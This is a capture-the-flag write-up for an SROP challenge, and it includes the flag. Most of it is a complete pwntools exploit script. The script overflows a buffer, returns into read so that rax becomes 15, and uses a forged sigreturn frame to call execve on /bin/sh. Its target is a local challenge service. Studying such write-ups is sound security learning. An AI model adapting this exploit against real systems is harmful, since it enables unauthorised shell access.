Tags: pwn srop
### Writeup
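This is an SROP (sigreturn-oriented programming) challenge. The script overflows the buffer with 32 bytes of padding and returns into the binary's `read`. A second send of 0xf bytes makes `read` return 15, the `rt_sigreturn` syscall number, in `rax`. The syscall at 0x401047 then loads the forged signal frame, which sets the registers for `execve` on `/bin/sh`. Exploit script: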
```py
#!/usr/bin/env python3
from pwn import *
context.binary = elf = ELF('../src/chall')
io = remote('127.0.0.1', 38894)
# io = gdb.debug([elf.path])
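io.readline()  # consume the program's first line of output
offset = 32  # bytes of padding before the saved return address
payload = b'A' * offset
payload += pack(0x40101b)  # read: the next send's byte count ends up in rax
payload += pack(0x401047)  # syscall, reached with rax = 0xf (rt_sigreturn)
# Forged signal frame that rt_sigreturn loads into the registers
frame = SigreturnFrame()
frame.rax = 0x3b  # syscall number for execve
frame.rdi = 0x40200f  # pointer to /bin/sh
frame.rsi = 0x0  # NULL
frame.rdx = 0x0  # NULL
frame.rip = 0x401047  # same syscall instruction, now executing execve
payload += bytes(frame)
io.send(payload)
sleep(1)  # keep the two sends from being merged into a single read
io.send(b'Z' * 0xf)  # 15 bytes read, so read returns 0xf = rt_sigreturn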
io.interactive()
```
### Flag - n00bz{SR0P_1$_s0_fun_r1ght??}